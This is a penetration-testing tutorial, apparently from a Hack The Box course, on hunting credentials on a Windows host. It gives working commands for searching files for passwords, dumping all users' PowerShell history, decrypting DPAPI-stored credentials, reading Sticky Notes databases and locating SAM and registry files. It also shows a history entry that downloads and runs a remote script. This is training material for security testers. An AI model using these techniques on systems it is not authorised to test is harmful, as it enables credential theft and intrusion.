Credential hunting

Checking Application Configuration Files

PS C:\Abhay> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

Sensitive IIS information such as credentials may be stored in a web.config file. For the
default IIS website, this could be located at C:\inetpub\wwwroot\web.config , but there may
be multiple versions of this file in different locations, which we can search for recursively.

Checking Chrome Dictionary Files

PS C:\Abhay> gc 'C:\Users\Abhay\AppData\Local\Google\Chrome\User
Data\Default\Custom Dictionary.txt' | Select-String password

Password1234!

Checking Unattended Installation Files

Passwords in the unattend.xml are stored in plaintext or base64 encoded.

Search unattend.xml

Unattend.xml

<?xml version="1.0" encoding="utf-8"?>

<unattend xmlns="urn:schemas-microsoft-com:unattend">
<settings pass="specialize">
<component name="Microsoft-Windows-Shell-Setup"
processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35"
language="neutral" versionScope="nonSxS"
xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<AutoLogon>
<Password>
<Value>local_4dmin_p@ss</Value>
<PlainText>true</PlainText>
</Password>
<Enabled>true</Enabled>
<LogonCount>2</LogonCount>
<Username>Administrator</Username>
 </AutoLogon>
<ComputerName>*</ComputerName>
</component>
</settings>

Checking PowerShell History File

Command For Powershell 5.0 in Windows 10
Powershell Stores Commands history to The Files

C:\Users\
<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost
_history.txt`

Confirming PowerShell History Save Path

As seen in the (handy) Windows Commands PDF, published by Microsoft here, there are many
commands which can pass credentials on the command line. We can see in the example below
that the user-specified local administrative credentials to query the Application Event Log
using wevutil.

PS C:\htb> (Get-PSReadLineOption).HistorySavePath

C:\Users\htb-
student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_hi
story.txt

Command For Reading PowerShell history File

PS C:\htb> gc (Get-PSReadLineOption).HistorySavePath

dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol =
[System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object
System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packag
es/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))

One Linear Command to Check all Users History

Files
We can also use this one-liner to retrieve the contents of all Powershell history files that we can
access as our current user. This can also be extremely helpful as a post-exploitation step. We
should always recheck these files once we have local admin if our prior access did not allow us
to read the files for some users. This command assumes that the default save path is being
used

PS C:\htb> foreach($user in ((ls C:\users).fullname)){cat

"$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_his
tory.txt" -ErrorAction SilentlyContinue}

dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol =
[System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object
System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packag
es/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true
/u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02

PowerShell Credentials
PowerShell credentials are often used for scripting and automation tasks as a way to store
encrypted credentials conveniently. The credentials are protected using DPAPI, which typically
means they can only be decrypted by the same user on the same computer they were created
on.

Take, for example, the following script Connect-VC.ps1 , which a sysadmin has created to
connect to a vCenter server easily.

Code: powershell

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

Decrypting PowerShell Credentials

If we have gained command execution in the context of this user or can abuse DPAPI, then we
can recover the cleartext credentials from encrypted.xml . The example below assumes the
former.

Credential Hunting

PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'

PS C:\htb> $credential.GetNetworkCredential().username

bob

PS C:\htb> $credential.GetNetworkCredential().password

Str0ng3ncryptedP@ss!

Manually Searching the File System for Credentials

We can search the file system or share drive(s) manually using the following commands
from this cheatsheet.

Search File Contents for String - Example 1

Other Files

C:\Abhay> cd c:\Users\Abhay\Documents & findstr /SI /M "password" *.xml *.ini

*.txt

stuff.txt

Search File Contents for String - Example 2

Other Files

C:\Abhay> findstr /si password *.xml *.ini *.txt *.config

stuff.txt:password: l#-x9r11_2_GL!

Search File Contents for String - Example 3

Other Files

C:\Abhay> findstr /spin "password" *.*

stuff.txt:1:password: l#-x9r11_2_GL!

Search File Contents with PowerShell

We can also search using PowerShell in a variety of ways. Here is one example.

Other Files

PS C:\Abhay> select-string -Path C:\Users\Abhay\Documents\*.txt -Pattern

password

stuff.txt:1:password: l#-x9r11_2_GL!

Search for File Extensions - Example 1

Other Files

C:\Abhay> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc*

== *.config*

c:\inetpub\wwwroot\web.config

Search for File Extensions - Example 2

Other Files

C:\Abhay> where /R C:\ *.config

c:\inetpub\wwwroot\web.config

Similarly, we can search the file system for certain file extensions with a command such as:

Search for File Extensions Using PowerShell

Other Files

PS C:\Abhay> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc,

*.cred -ErrorAction Ignore

Directory: C:\inetpub\wwwroot

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 5/25/2021 9:59 AM 329 web.config

<SNIP>
Sticky Notes Passwords
People often use the StickyNotes app on Windows workstations to save passwords and other
information, not realizing it is a database file. This file is located at C:\Users\
<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalSt
ate\plum.sqlite and is always worth searching for and examining.

Looking for StickyNotes DB Files

Other Files

PS C:\Abhay> ls

Directory:
C:\Users\Abhay\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8
bbwe\LocalState

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 5/25/2021 11:59 AM 20480
15cbbc93e90a4d56bf8d9a29305b8981.storage.session
-a---- 5/25/2021 11:59 AM 982 Ecs.dat
-a---- 5/25/2021 11:59 AM 4096 plum.sqlite
-a---- 5/25/2021 11:59 AM 32768 plum.sqlite-shm
-a---- 5/25/2021 12:00 PM 197792 plum.sqlite-wal

We can copy the three plum.sqlite* files down to our system and open them with a tool such
as DB Browser for SQLite and view the Text column in the Note table with the query select
Text from Note; .

Viewing Sticky Notes Data Using PowerShell

This can also be done with PowerShell using the PSSQLite module. First, import the module,
point to a data source (in this case, the SQLite database file used by the StickNotes app), and
finally query the Note table and look for any interesting data. This can also be done from our
attack machine after downloading the .sqlite file or remotely via WinRM.

Other Files

PS C:\Abhay> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change

The execution policy helps protect you from scripts that you do not trust.
Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic
at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the
execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default
is "N"): A

PS C:\Abhay> cd .\PSSQLite\
PS C:\Abhay> Import-Module .\PSSQLite.psd1
PS C:\Abhay> $db =
'C:\Users\Abhay\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d
8bbwe\LocalState\plum.sqlite'
PS C:\Abhay> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" |
ft -wrap

Text
----
\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter
\id=e4adae4c-a40b-48b4-93a5-900247852f96
\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:Vc3nt3R_adm1n!
\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am

Strings to View DB File Contents

We can also copy them over to our attack box and search through the data using
the strings command, which may be less efficient depending on the size of the database.

Other Files

Abhay@htb[/htb]$ strings plum.sqlite-wal

CREATE TABLE "Note" (

"Text" varchar ,
"WindowPosition" varchar ,
"IsOpen" integer ,
"IsAlwaysOnTop" integer ,
"CreationNoteIdAnchor" varchar ,
 "Theme" varchar ,
"IsFutureNote" integer ,
"RemoteId" varchar ,
"ChangeKey" varchar ,
"LastServerVersion" varchar ,
"RemoteSchemaVersion" integer ,
"IsRemoteDataInvalid" integer ,
"PendingInsightsScan" integer ,
"Type" varchar ,
"Id" varchar primary key not null ,
"ParentId" varchar ,
"CreatedAt" bigint ,
"DeletedAt" bigint ,
"UpdatedAt" bigint )'
indexsqlite_autoindex_Note_1Note
af907b1b-1eef-4d29-b238-3ea74f7ffe5caf907b1b-1eef-4d29-b238-3ea74f7ffe5c
U af907b1b-1eef-4d29-b238-3ea74f7ffe5c
Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c
U 93b49900-6530-42e0-b35c-2663989ae4b3

< SNIP >

\id=011f29a4-e37f-451d-967e-c42b818473c2 vCenter
\id=34910533-ddcf-4ac4-b8ed-3d1f10be9e61 alright*
\id=ffaea2ff-b4fc-4a14-a431-998dc833208c
root:Vc3nt3R_adm1n!ManagedPosition=Yellow93b49900-6530-42e0-b35c-
2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c

<SNIP >

Other Files of Interest

Other Interesting Files

Some other files we may find credentials in include the following:

Other Files

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
 %WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*

Some of the privilege escalation enumeration scripts listed earlier in this module search for
most, if not all, of the files/extensions mentioned in this section. Nevertheless, we must
understand how to search for these manually and not only rely on tools. Furthermore, we may
find interesting files that enumeration scripts do not look for and wish to modify the scripts to
include them.